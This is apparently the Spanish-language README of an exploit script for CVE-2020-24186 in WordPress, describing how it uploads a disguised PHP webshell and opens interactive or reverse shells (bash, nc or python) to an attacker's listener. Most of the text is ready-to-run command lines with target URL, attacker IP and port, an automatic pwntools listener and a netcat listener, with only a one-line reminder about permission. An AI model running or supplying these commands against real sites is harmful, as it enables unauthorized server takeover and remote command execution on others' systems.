
Este script explota la vulnerabilidad CVE-2020-24186 en WordPress para subir un payload PHP camuflado y obtener una shell en el sistema objetivo. Hay tres modos de operación:
Shell interactiva:
Sube la webshell básica y entra en un modo interactivo, permitiéndote enviar comandos a través del parámetro cmd.
Shell inversa manual:
Sube la webshell y envía el payload de shell inversa, pero no lanza automáticamente un listener. Debes iniciar manualmente tu propio listener en la IP y el puerto especificados.
Shell inversa con pwntools:
Sube la webshell, envía el payload de shell inversa, y el script lanza automáticamente un listener usando pwntools para capturar la conexión inversa.
requestspwn (pwntools)--url: URL base del sitio objetivo (p. ej., http://10.10.110.119).--blogpath: Ruta a la entrada (por defecto: /?page=1).--mode: Modo de operación, ya sea interactive o reverse.--lhost: IP local para la shell inversa (requerida en modo reverse).--lport: Puerto local para la shell inversa (requerido en modo reverse).--reverse_method: Método de shell inversa: bash, nc o python (por defecto es bash).--manual: Cuando se usa en modo reverse, el script no lanzará el listener; debes iniciar tu propio listener manualmente.--use-proxy: Si se establece, las peticiones se enviarán a través del proxy configurado.Sube una webshell e inicia una sesión interactiva para enviar comandos:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Sube la webshell, envía el payload de shell inversa, pero no inicies un listener automáticamente. Inicia tu propio listener manualmente (p. ej., usando netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Luego, en otra terminal, inicia tu listener manualmente:
nc -lvnp 9002
Sube la webshell, envía el payload de shell inversa y haz que el script lance automáticamente un listener con pwntools para capturar la conexión:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
El script esperará una conexión en 10.10.1.1:9002 y, una vez conectado, proporcionará una shell interactiva.
Notas Asegúrate de que el sitio objetivo sea vulnerable a CVE-2020-24186 y de que tengas los permisos necesarios para realizar pruebas de seguridad. Puedes modificar el payload PHP usando la opción --php_payload si necesitas ajustes. Comprueba la configuración del proxy si usas la opción --use-proxy.